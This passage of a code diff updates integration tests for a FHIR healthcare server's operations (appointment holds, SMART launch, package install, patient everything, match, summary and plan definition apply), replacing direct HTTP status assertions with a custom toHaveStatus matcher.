     test('rejects when bufferBefore slot is missing', async () => {
@@ -1002,7 +1002,7 @@ describe('Appointment/$hold', () => {
         .set('Authorization', `Bearer ${project.accessToken}`)
         .send(holdParams({ schedule, start: '2026-01-15T10:00:00-05:00', end: '2026-01-15T11:00:00-05:00' }));
 
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
       expect(response.body).toHaveProperty('issue', [
         expect.objectContaining({
           severity: 'error',
@@ -1043,7 +1043,7 @@ describe('Appointment/$hold', () => {
           })
         );
 
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
       expect(response.body).toHaveProperty('issue', [
         expect.objectContaining({
           severity: 'error',
@@ -1086,7 +1086,7 @@ describe('Appointment/$hold', () => {
           })
         );
 
-      expect(response.status).toEqual(201);
+      expect(response).toHaveStatus(201);
 
       const entries = ((response.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
       const bufferSlots = entries.filter(isSlot).filter((s) => s.status === 'busy-unavailable');
@@ -1104,7 +1104,7 @@ describe('Appointment/$hold', () => {
         .set('Authorization', `Bearer ${project.accessToken}`)
         .send(holdParams({ schedule, start: '2026-01-15T09:00:00-05:00', end: '2026-01-15T10:00:00-05:00' }));
 
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
       expect(response.body).toHaveProperty('issue', [
         expect.objectContaining({
           severity: 'error',
@@ -1146,7 +1146,7 @@ describe('Appointment/$hold', () => {
           })
         );
 
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
       expect(response.body).toHaveProperty('issue', [
         expect.objectContaining({
           severity: 'error',
@@ -1173,7 +1173,7 @@ describe('Appointment/$hold', () => {
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start: '2026-01-15T14:00:00Z', end: '2026-01-15T15:00:00Z' }));
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ details: { text: 'Scheduling only supported on schedules with exactly one actor' } }],
@@ -1189,7 +1189,7 @@ describe('Appointment/$hold', () => {
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start: '2026-01-15T14:00:00Z', end: '2026-01-15T15:00:00Z' }));
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ details: { text: 'No timezone specified' } }],
@@ -1207,7 +1207,7 @@ describe('Appointment/$hold', () => {
       .post('/fhir/R4/Appointment/$hold')
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start: '2025-12-28T14:00:00Z', end: '2025-12-28T15:00:00Z' }));
-    expect(beforeHorizonResponse.status).toBe(400);
+    expect(beforeHorizonResponse).toHaveStatus(400);
     expect(beforeHorizonResponse.body.issue[0].details.text).toBe(
       'Appointment falls outside schedule planning horizon'
     );
@@ -1217,7 +1217,7 @@ describe('Appointment/$hold', () => {
       .post('/fhir/R4/Appointment/$hold')
       .set('Authorization', `Bearer ${project.accessToken}`)
       .send(holdParams({ schedule, start: '2026-01-15T14:00:00Z', end: '2026-01-15T15:00:00Z' }));
-    expect(afterHorizonResponse.status).toBe(400);
+    expect(afterHorizonResponse).toHaveStatus(400);
     expect(afterHorizonResponse.body.issue[0].details.text).toBe('Appointment falls outside schedule planning horizon');
   });
 });
@@ -1308,7 +1308,7 @@ describe('scheduling flow integration test', () => {
       });
 
     expect(findResponse.body).not.toHaveProperty('issue');
-    expect(findResponse.status).toBe(200);
+    expect(findResponse).toHaveStatus(200);
     expect(findResponse.body).toHaveProperty('entry');
     expect(findResponse.body.entry).toHaveLength(4);
     const proposedAppointment: Appointment = findResponse.body.entry[1].resource;
@@ -1327,6 +1327,6 @@ describe('scheduling flow integration test', () => {
       });
 
     expect(bookResponse.body).not.toHaveProperty('issue');
-    expect(bookResponse.status).toBe(201);
+    expect(bookResponse).toHaveStatus(201);
   });
 });

--- a/packages/server/src/fhir/operations/launch.test.ts
+++ b/packages/server/src/fhir/operations/launch.test.ts
@@ -42,7 +42,7 @@ describe('ClientApplication/:id/$smart-launch', () => {
       .get('/fhir/R4/ClientApplication/$smart-launch')
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Requires launchUri to be configured', async () => {
@@ -50,7 +50,7 @@ describe('ClientApplication/:id/$smart-launch', () => {
       .get(`/fhir/R4/ClientApplication/${client.id}/$smart-launch`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Redirects to launchUri', async () => {
@@ -62,7 +62,7 @@ describe('ClientApplication/:id/$smart-launch', () => {
       .get(`/fhir/R4/ClientApplication/${client.id}/$smart-launch`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     expect(res.headers['location'].startsWith(launchUri + '?')).toBe(true);
 
     const uri = new URL(res.headers['location']);
@@ -83,7 +83,7 @@ describe('ClientApplication/:id/$smart-launch', () => {
       .get(`/fhir/R4/ClientApplication/${otherProject.client.id}/$smart-launch`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Preserves launch parameter', async () => {
@@ -98,7 +98,7 @@ describe('ClientApplication/:id/$smart-launch', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .query({ patient: patient.id })
       .send();
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
     expect(res.headers['location'].startsWith(launchUri + '?')).toBe(true);
 
     const uri = new URL(res.headers['location']);
@@ -126,6 +126,6 @@ describe('ClientApplication/:id/$smart-launch', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .query({ patient: patient.id, encounter: encounter.id })
       .send();
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 });

--- a/packages/server/src/fhir/operations/packageinstall.test.ts
+++ b/packages/server/src/fhir/operations/packageinstall.test.ts
@@ -102,7 +102,7 @@ describe('PackageRelease $install', () => {
       .set('Authorization', 'Bearer ' + nonAdminAccessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Success for admin user', async () => {
@@ -159,14 +159,14 @@ describe('PackageRelease $install', () => {
       .set('Authorization', 'Bearer ' + adminAccessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app)
       .get(`/fhir/R4/PackageInstallation?version=${packageRelease.version}`)
       .set('Authorization', 'Bearer ' + adminAccessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const installations = res2.body.entry.map((e: any) => e.resource) as PackageInstallation[];
     expect(installations.length).toBe(1);
     expect(installations[0].status).toBe('installed');
@@ -236,7 +236,7 @@ describe('PackageRelease $install', () => {
       .set('Authorization', 'Bearer ' + adminAccessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     const installations = res2.body.entry.map((e: any) => e.resource) as PackageInstallation[];
     expect(installations.length).toBe(1);
     expect(installations[0].status).toBe('error');
@@ -250,6 +250,6 @@ describe('PackageRelease $install', () => {
       .set('Authorization', 'Bearer ' + adminAccessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 });

--- a/packages/server/src/fhir/operations/patienteverything.test.ts
+++ b/packages/server/src/fhir/operations/patienteverything.test.ts
@@ -48,7 +48,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Organization' });
-    expect(orgRes.status).toBe(201);
+    expect(orgRes).toHaveStatus(201);
     const organization = orgRes.body as Organization;
 
     // Create practitioner
@@ -60,7 +60,7 @@ describe('Patient Everything Operation', () => {
         resourceType: 'Practitioner',
         qualification: [{ code: { text: 'MD' }, issuer: createReference(organization) }],
       });
-    expect(practRes.status).toBe(201);
+    expect(practRes).toHaveStatus(201);
     const practitioner = practRes.body as Practitioner;
 
     // Create patient
@@ -78,7 +78,7 @@ describe('Patient Everything Operation', () => {
         ],
         managingOrganization: createReference(organization),
       } satisfies Patient);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const patient = res1.body as Patient;
 
     // Create observation
@@ -93,7 +93,7 @@ describe('Patient Everything Operation', () => {
         subject: createReference(patient),
         performer: [createReference(practitioner), createReference(organization)],
       } satisfies Observation);
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     const observation = res2.body as Observation;
 
     // Create condition
@@ -110,14 +110,14 @@ describe('Patient Everything Operation', () => {
         subject: createReference(patient),
         recorder: createReference(practitioner),
       } satisfies Condition);
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     const condition = res3.body as Condition;
 
     // Execute the operation
     const res4 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     const result = res4.body as Bundle;
     expect(result.entry?.length).toStrictEqual(5);
     expect(
@@ -142,14 +142,14 @@ describe('Patient Everything Operation', () => {
         subject: createReference(patient),
         performer: [createReference(practitioner), createReference(organization)],
       } satisfies Observation);
-    expect(res5.status).toBe(201);
+    expect(res5).toHaveStatus(201);
     const newObservation = res5.body as Observation;
 
     // Execute the operation with _since
     const res6 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything?_since=${newObservation.meta?.lastUpdated}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     const sinceResult = res6.body as Bundle;
     expect(
       sinceResult.entry?.map((e) => `${e.search?.mode}:${getReferenceString(e.resource as Resource)}`).sort()
@@ -163,7 +163,7 @@ describe('Patient Everything Operation', () => {
     const res7 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything?_count=1&_offset=1`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
 
     // Bundle should have pagination links
     const bundle = res7.body as Bundle;
@@ -188,7 +188,7 @@ describe('Patient Everything Operation', () => {
     const res8 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything?_count=1&_type=Observation`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     const typeBundle = res8.body as Bundle;
     for (const link of typeBundle.link ?? []) {
       const url = new URL(link.url);
@@ -201,7 +201,7 @@ describe('Patient Everything Operation', () => {
     const res9 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything?start=2020-01-01&end=2040-01-01`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res9.status).toBe(200);
+    expect(res9).toHaveStatus(200);
   });
 
   test('Inline DocumentReference attachments', async () => {
@@ -211,7 +211,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', name: [{ given: ['Bob'], family: 'Jones' }] } satisfies Patient);
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as Patient;
 
     // Upload a binary
@@ -220,7 +220,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello attachment');
-    expect(binaryRes.status).toBe(201);
+    expect(binaryRes).toHaveStatus(201);
     const binary = binaryRes.body as Binary;
 
     // Create a DocumentReference pointing to the binary
@@ -234,13 +234,13 @@ describe('Patient Everything Operation', () => {
         subject: createReference(patient),
         content: [{ attachment: { url: binary.url } }],
       } satisfies DocumentReference);
-    expect(docRefRes.status).toBe(201);
+    expect(docRefRes).toHaveStatus(201);
 
     // Without _inlineAttachments, the URL should remain
     const withoutInline = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$everything`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(withoutInline.status).toBe(200);
+    expect(withoutInline).toHaveStatus(200);
     const bundleWithout = withoutInline.body as Bundle;
     const docRefWithout = bundleWithout.entry
       ?.map((e) => e.resource)
@@ -255,7 +255,7 @@ describe('Patient Everything Operation', () => {
       const withInline = await request(app)
         .get(`/fhir/R4/Patient/${patient.id}/$everything?_inlineAttachments=true`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(withInline.status).toBe(200);
+      expect(withInline).toHaveStatus(200);
       const bundleWith = withInline.body as Bundle;
       const docRefWith = bundleWith.entry
         ?.map((e) => e.resource)
@@ -286,7 +286,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + projectAccessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', name: [{ given: ['Project'], family: 'Setting' }] } satisfies Patient);
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as Patient;
 
     const binaryRes = await request(app)
@@ -294,7 +294,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + projectAccessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Project setting attachment');
-    expect(binaryRes.status).toBe(201);
+    expect(binaryRes).toHaveStatus(201);
     const binary = binaryRes.body as Binary;
 
     const docRefRes = await request(app)
@@ -307,13 +307,13 @@ describe('Patient Everything Operation', () => {
         subject: createReference(patient),
         content: [{ attachment: { url: binary.url, contentType: ContentType.TEXT } }],
       } satisfies DocumentReference);
-    expect(docRefRes.status).toBe(201);
+    expect(docRefRes).toHaveStatus(201);
 
     try {
       const res = await request(app)
         .get(`/fhir/R4/Patient/${patient.id}/$everything`)
         .set('Authorization', 'Bearer ' + projectAccessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       const bundle = res.body as Bundle;
       const docRef = findDocumentReference(bundle);
       expect(docRef?.content?.[0]?.attachment?.url).toBeUndefined();
@@ -324,7 +324,7 @@ describe('Patient Everything Operation', () => {
       const optOutRes = await request(app)
         .get(`/fhir/R4/Patient/${patient.id}/$everything?_inlineAttachments=false`)
         .set('Authorization', 'Bearer ' + projectAccessToken);
-      expect(optOutRes.status).toBe(200);
+      expect(optOutRes).toHaveStatus(200);
       const optOutDocRef = findDocumentReference(optOutRes.body as Bundle);
       expect(optOutDocRef?.content?.[0]?.attachment?.url).toBeDefined();
       expect(optOutDocRef?.content?.[0]?.attachment?.data).toBeUndefined();
@@ -339,7 +339,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' } satisfies Patient);
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as Patient;
 
     const expectedIds = new Set<string>([patient.id as string]);
@@ -354,7 +354,7 @@ describe('Patient Everything Operation', () => {
           code: { text: 'patient_everything_cursor_test' },
           subject: createReference(patient),
         } satisfies Observation);
-      expect(obsRes.status).toBe(201);
+      expect(obsRes).toHaveStatus(201);
       expectedIds.add(obsRes.body.id);
     }
 
@@ -364,7 +364,7 @@ describe('Patient Everything Operation', () => {
       const res = await request(app)
         .get(url)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const bundle = res.body as Bundle;
       for (const entry of bundle.entry ?? []) {
@@ -398,7 +398,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', name: [{ given: ['Max'], family: 'SizeTest' }] } satisfies Patient);
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as Patient;
 
     const binaryRes = await request(app)
@@ -406,7 +406,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('123456');
-    expect(binaryRes.status).toBe(201);
+    expect(binaryRes).toHaveStatus(201);
     const binary = binaryRes.body as Binary;
 
     const secondBinaryRes = await request(app)
@@ -414,7 +414,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('67890');
-    expect(secondBinaryRes.status).toBe(201);
+    expect(secondBinaryRes).toHaveStatus(201);
     const secondBinary = secondBinaryRes.body as Binary;
 
     const thirdBinaryRes = await request(app)
@@ -422,7 +422,7 @@ describe('Patient Everything Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('x');
-    expect(thirdBinaryRes.status).toBe(201);
+    expect(thirdBinaryRes).toHaveStatus(201);
     const thirdBinary = thirdBinaryRes.body as Binary;
 
     const docRefRes = await request(app)
@@ -451,13 +451,13 @@ describe('Patient Everything Operation', () => {
           { attachment: { url: thirdBinary.url, contentType: ContentType.TEXT } },
         ],
       } satisfies DocumentReference);
-    expect(docRefRes.status).toBe(201);
+    expect(docRefRes).toHaveStatus(201);
 
     try {
       const res = await request(app)
         .get(`/fhir/R4/Patient/${patient.id}/$everything?_inlineAttachments=true`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       const bundle = res.body as Bundle;
       const docRef = findDocumentReference(bundle);
       expect(docRef?.content?.[0]?.attachment?.url).toBeDefined();

--- a/packages/server/src/fhir/operations/patientmatch.test.ts
+++ b/packages/server/src/fhir/operations/patientmatch.test.ts
@@ -31,7 +31,7 @@ describe('Patient $match Operation', () => {
         resourceType: 'Parameters',
         parameter: [],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Returns 400 when resource is not a Patient', async () => {
@@ -48,7 +48,7 @@ describe('Patient $match Operation', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Returns 400 when Patient has no matchable fields', async () => {
@@ -67,7 +67,7 @@ describe('Patient $match Operation', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Returns 400 when Patient only has gender', async () => {
@@ -87,7 +87,7 @@ describe('Patient $match Operation', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Returns empty bundle when no patients match', async () => {
@@ -108,7 +108,7 @@ describe('Patient $match Operation', () => {
           },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle;
     expect(bundle.resourceType).toBe('Bundle');
     expect(bundle.type).toBe('searchset');
@@ -129,7 +129,7 @@ describe('Patient $match Operation', () => {
         birthDate: '1980-06-15',
         gender: 'female',
       } satisfies Patient);
-    expect(createRes.status).toBe(201);
+    expect(createRes).toHaveStatus(201);
 
     const matchRes = await request(app)
       .post('/fhir/R4/Patient/$match')
@@ -151,7 +151,7 @@ describe('Patient $match Operation', () => {
         ],
       });
 
-    expect(matchRes.status).toBe(200);
+    expect(matchRes).toHaveStatus(200);
     const bundle = matchRes.body as Bundle<Patient>;
     expect(bundle.type).toBe('searchset');
     expect(bundle.total).toBeGreaterThan(0);
@@ -197,7 +197,7 @@ describe('Patient $match Operation', () => {
         ],
       });
 
-    expect(matchRes.status).toBe(200);
+    expect(matchRes).toHaveStatus(200);
     const bundle = matchRes.body as Bundle<Patient>;
     expect(bundle.total).toBeGreaterThan(0);
     const topEntry = bundle.entry?.[0];
@@ -219,7 +219,7 @@ describe('Patient $match Operation', () => {
         birthDate,
         telecom: [{ system: 'phone', value: phone }],
       } satisfies Patient);
-    expect(createRes.status).toBe(201);
+    expect(createRes).toHaveStatus(201);
 
     const matchRes = await request(app)
       .post('/fhir/R4/Patient/$match')
@@ -240,7 +240,7 @@ describe('Patient $match Operation', () => {
         ],
       });
 
-    expect(matchRes.status).toBe(200);
+    expect(matchRes).toHaveStatus(200);
     const bundle = matchRes.body as Bundle<Patient>;
     expect(bundle.entry?.some((e) => e.resource?.id === createRes.body.id)).toBe(true);
   });
@@ -258,7 +258,7 @@ describe('Patient $match Operation', () => {
         birthDate,
         telecom: [{ system: 'email', value: email }],
       } satisfies Patient);
-    expect(createRes.status).toBe(201);
+    expect(createRes).toHaveStatus(201);
 
     const matchRes = await request(app)
       .post('/fhir/R4/Patient/$match')
@@ -279,7 +279,7 @@ describe('Patient $match Operation', () => {
         ],
       });
 
-    expect(matchRes.status).toBe(200);
+    expect(matchRes).toHaveStatus(200);
     const bundle = matchRes.body as Bundle<Patient>;
     expect(bundle.entry?.some((e) => e.resource?.id === createRes.body.id)).toBe(true);
   });
@@ -314,7 +314,7 @@ describe('Patient $match Operation', () => {
         ],
       });
 
-    expect(matchRes.status).toBe(200);
+    expect(matchRes).toHaveStatus(200);
     const bundle = matchRes.body as Bundle<Patient>;
     // All results must be 'certain' grade
     for (const entry of bundle.entry ?? []) {
@@ -362,7 +362,7 @@ describe('Patient $match Operation', () => {
         ],
       });
 
-    expect(matchRes.status).toBe(200);
+    expect(matchRes).toHaveStatus(200);
     const bundle = matchRes.body as Bundle<Patient>;
     expect((bundle.entry ?? []).length).toBeLessThanOrEqual(2);
   });
@@ -397,7 +397,7 @@ describe('Patient $match Operation', () => {
         birthDate,
         telecom: [{ system: 'phone', value: phone }],
       });
-      expect(created.status).toBe(201);
+      expect(created).toHaveStatus(201);
 
       // First name + DOB + phone uniquely identify the patient (with different phone formatting).
       const res = await cmsMatch({
@@ -407,7 +407,7 @@ describe('Patient $match Operation', () => {
         telecom: [{ system: 'phone', value: phone }],
       });
 
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       const bundle = res.body as Bundle<Patient>;
       expect(bundle.entry).toHaveLength(1);
       const entry = bundle.entry?.[0];
@@ -443,14 +443,14 @@ describe('Patient $match Operation', () => {
         telecom: [{ system: 'phone', value: phone }],
       });
 
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       const bundle = res.body as Bundle<Patient>;
       expect(bundle.entry ?? []).toHaveLength(0);
     });
 
     test('no match when only a single non-discriminating field agrees', async () => {
       const res = await cmsMatch({ resourceType: 'Patient', birthDate: '1973-09-25', name: [{ given: ['Solo'] }] });
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect((res.body as Bundle<Patient>).entry ?? []).toHaveLength(0);
     });
 
@@ -468,7 +468,7 @@ describe('Patient $match Operation', () => {
         birthDate: '1975-03-22',
       });
 
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect((res.body as Bundle<Patient>).entry ?? []).toHaveLength(0);
     });
   });

--- a/packages/server/src/fhir/operations/patientsummary.test.ts
+++ b/packages/server/src/fhir/operations/patientsummary.test.ts
@@ -63,7 +63,7 @@ describe('Patient Summary Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Organization' });
-    expect(orgRes.status).toBe(201);
+    expect(orgRes).toHaveStatus(201);
     const organization = orgRes.body as WithId<Organization>;
 
     // Create practitioner
@@ -72,7 +72,7 @@ describe('Patient Summary Operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Practitioner' });
-    expect(practRes.status).toBe(201);
+    expect(practRes).toHaveStatus(201);
     const practitioner = practRes.body as WithId<Practitioner>;
 
     // Create patient
@@ -90,7 +90,7 @@ describe('Patient Summary Operation', () => {
         ],
         managingOrganization: createReference(organization),
       } satisfies Patient);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const patient = res1.body as WithId<Patient>;
 
     // Create observation
@@ -106,7 +106,7 @@ describe('Patient Summary Operation', () => {
         subject: createReference(patient),
         performer: [createReference(practitioner), createReference(organization)],
       } satisfies Observation);
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     const observation = res2.body as WithId<Observation>;
 
     // Create condition
@@ -123,14 +123,14 @@ describe('Patient Summary Operation', () => {
         subject: createReference(patient),
         recorder: createReference(practitioner),
       } satisfies Condition);
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     const condition = res3.body as WithId<Condition>;
 
     // Execute the operation
     const res4 = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$summary`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     const result = res4.body as WithId<Bundle>;
     expect(result.type).toBe('document');

--- a/packages/server/src/fhir/operations/plandefinitionapply.test.ts
+++ b/packages/server/src/fhir/operations/plandefinitionapply.test.ts
@@ -65,7 +65,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // 2. Create a PlanDefinition
     const res2 = await request(app)
@@ -83,7 +83,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // 3. Create a Patient
     const res3 = await request(app)
@@ -94,7 +94,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Demo' }],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // 4. Apply the PlanDefinition to create the Task and RequestGroup
     const res4 = await request(app)
@@ -110,7 +110,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toStrictEqual('CarePlan');
     const carePlan = res4.body as WithId<CarePlan>;
 
@@ -118,7 +118,7 @@ describe('PlanDefinition apply', () => {
     const res5 = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     const requestGroup = res5.body as RequestGroup;
     expect(requestGroup.action).toHaveLength(1);
     const taskReference = requestGroup.action?.[0]?.resource?.reference;
@@ -128,7 +128,7 @@ describe('PlanDefinition apply', () => {
     const res6 = await request(app)
       .get(`/fhir/R4/${taskReference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body.resourceType).toStrictEqual('Task');
     const resultTask = res6.body as Task;
 
@@ -169,7 +169,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // 2. Create a PlanDefinition
     const res2 = await request(app)
@@ -187,7 +187,7 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // 3. Create a Patient
     const res3 = await request(app)
@@ -198,7 +198,7 @@ describe('PlanDefinition apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Workflow'], family: 'Test' }],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // 4. Create an Encounter
     const res4 = await request(app)
@@ -214,7 +214,7 @@ describe('PlanDefinition apply', () => {
           display: 'emergency',
         },
       });
-    expect(res4.status).toBe(201);
+    expect(res4).toHaveStatus(201);
 
     // 5. Apply the PlanDefinition to create the Task and RequestGroup
     const res5 = await request(app)
@@ -234,14 +234,14 @@ describe('PlanDefinition apply', () => {
           },
         ],
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.resourceType).toStrictEqual('CarePlan');
     const carePlan = res5.body as CarePlan;
 
     const resRG = await request(app)
       .get(`/fhir/R4/${carePlan.activity?.[0]?.reference?.reference}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(resRG.status).toBe(200);
+    expect(resRG).toHaveStatus(200);
     expect(resRG.body.resourceType).toBe('RequestGroup');
     const requestGroup = resRG.body as RequestGroup;
     expect(requestGroup.action).toHaveLength(1);
@@ -268,7 +268,7 @@ describe('PlanDefinition apply', () => {
     const res7 = await request(app)
       .get(`/fhir/R4/Encounter/${res4.body.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
   });
 
   test('Unsupported content type', async () => {
@@ -281,14 +281,14 @@ describe('PlanDefinition apply', () => {
         title: 'Example Plan Definition',
         status: 'active',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res4 = await request(app)
       .post(`/fhir/R4/PlanDefinition/${res2.body.id}/$apply`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect((res4.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       "Expected at least 1 value(s) for required input parameter 'subject'"
     );
@@ -304,7 +304,7 @@ describe('PlanDefinition apply', () => {
         title: 'Example Plan Definition',
         status: 'active',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const res4 = await request(app)
